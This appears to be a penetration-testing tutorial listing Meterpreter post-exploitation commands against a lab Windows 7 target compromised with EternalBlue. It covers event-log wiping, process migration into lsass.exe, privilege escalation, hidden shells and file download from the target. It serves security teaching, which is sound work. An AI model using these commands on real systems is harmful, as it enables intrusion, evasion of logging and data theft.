Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands

I thought that it would be useful, for some readers, if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit.
In this first video, we will discuss the Core, System, Networking and File System commands.

LAB details - VM names and IP addresses

Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3

Exploitation process

The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Core and System commands

We will start with Core and System commands and obviously the first command should be ... HELP !  :-)

1. help

See below the help output for the Core and System commands:

2. sysinfo

Use "sysinfo" in order to get essential information about the target computer:
Machine name, Operating System, OS architecture (x86/x64), system language, domain name.

3. getuid

The Meterpreter server is running on the target computer, under a specific user context. That particular user context will determine the level of permissions that the attacker has on the target computer. Obviously, we would like to have the highest level of permissions (system / local admin).
The "getuid" command will display the user context used by Meterpreter.
In our case, Meterpreter is running as SYSTEM, therefore it has all the available permissions.

4. background

There are situations when we successfully exploit a target and we get to a Meterpreter prompt, but we need to get back to a Metasploit prompt in order to run different other commands, without disconnecting the previously established Meterpreter session.
In that situation we would run the "background" command. The Meterpreter session will be sent into background and we will get back to the Metasploit prompt. The Meterpreter session will stay connected in the background, waiting to be reactivated.

5. sessions -l (or sessions)

Let's say that we successfully exploited multiple targets and we have multiple Meterpreter sessions running in the background.
The "sessions" command, depending on the command option, will allow to list, resume or terminate the Meterpreter sessions. See all the available options in the picture below:

"sessions -l" (or "sessions") will list all the active Meterpreter sessions

A Meterpreter session is identified by the session ID number.
(Session ID is 1 in the picture shown above)

6. sessions -i <Session_ID>

This command will resume interaction with a Meterpreter session that was previously sent to background. We will get back to the Meterpreter prompt.

7. clearev

The "clearev" command will remove all the records from Event Log, on the target computer.

8. localtime

This command will display the date and time on the target computer

9. ps 

The "ps" command will list all the processes running on the target computer ...

Note that each process is identified by a process ID number or PID
Also, each process runs under a user context

For example - lsass.exe has PID 512 and runs under the SYSTEM user context

10. ps -U <user_context>

This command will list only the processes running under the specified user context

Example:
ps -U 'TESTLAB3\\testuser1'

11. ps -s

This command will list all the processes running under the SYSTEM user context

12. pgrep <Process_Name>

This command will return the PID for the specified process name

Example:
pgrep wordpad

13. getpid

The "getpid" command will return the PID under which the Meterpreter server is currently running

In this case, the PID is 1040

14. migrate <New_PID>

This command will migrate the Meterpreter server from the current process to a new process having <New_PID>

Example:
migrate 512

15. kill <PID>

This command will terminate a process running on the target computer, having the specified <PID>

Example:
kill 2920

16. pkill <Process_Name>

This command will terminate a process specified by name

17. getsystem

This command will attempt to elevate the Meterpreter permissions on the target machine to SYSTEM (local admin) level.
In our lab, Meterpreter is already running under the SYSTEM user context, so the "getsystem" command is not going to achieve anything.

18. shell

This command will launch a system command shell on the target machine. After that, we can run any commands directly on the target machine.
"exit" will terminate the command shell and we will get back to the Meterpreter prompt.

19.  execute

This command will execute a specified command or application on the target machine.
Check the available options in the picture below:

Example:
execute -f cmd.exe -i -H
will launch a command shell on the target machine. The process will be hidden from view and we can interact with the shell after creating it.

20. reboot

This command will reboot the target computer. See the available options in the picture below:

File System commands

21. show_mount

This command will list all the logical drives and mount points available on the target computer

22. lpwd

The "lpwd" command will display the local working directory, on the Kali computer

23. lcd <New_Path>

This command allows changing the local working directory to <New_Path>

Example:

lcd /root/TEMP

24. pwd

"pwd" will display the remote working directory, on the target machine

25. cd <New_Path>

This command will change the remote working directory to <New_Path>

Example:

cd \

Note: Some File System commands will use by default the local and/or remote working directories, unless a particular directory is specified.  

26. dir or ls

This command will list the files located in the remote working directory (on the target computer)

Of course, we can also use this command by specifying a particular directory. 

27. cat <File_Name>

The "cat" command will display the contents of the specified file, to the screen

Example cat test1.txt

28. search

This command will search for a specified file or file pattern on the target computer

Example:

search -f *.txt -d 'c:\\TMP'

will search for text files into the c:\TMP directory (on the target computer)

29. edit

This command will edit the specified file

Example:

edit C:\\TMP\\test1.txt

Use :qa! to exit

30. download

This command will download files from the target computer to the local Kali computer

Examples:

download c:\\tmp\\test1.txt

will download the c:\tmp\test1.txt file to the local working directory.

download *.jpg

will download the jpeg files located into the remote working directory, to the local working directory

31. rm

The "rm" command will delete the specified file(s) from the target computer

Example:

rm test3.txt

32. upload

This command will upload files from the local Kali computer to the target computer.

Example:

upload test3.txt

will upload the test3.txt file located in the local working directory, to the remote working directory, on the target computer

Networking commands

33. arp

This command will display the arp cache on the target computer

34. ipconfig or ifconfig

This command will display the network interfaces and the ip configuration, on the target computer

35. netstat

This command will provide information about protocols in use and network connections, on the target computer 

36. route

This command will display and edit the routing table, on the target computer

37. resolve

This command will resolve host names, on the target computer

Example:

resolve w2008r21
will resolve the "w2008r21" name (that's the lab DC name)

Quick Meterpreter and Metasploit tutorial

Core, System, Networking and File System usual commands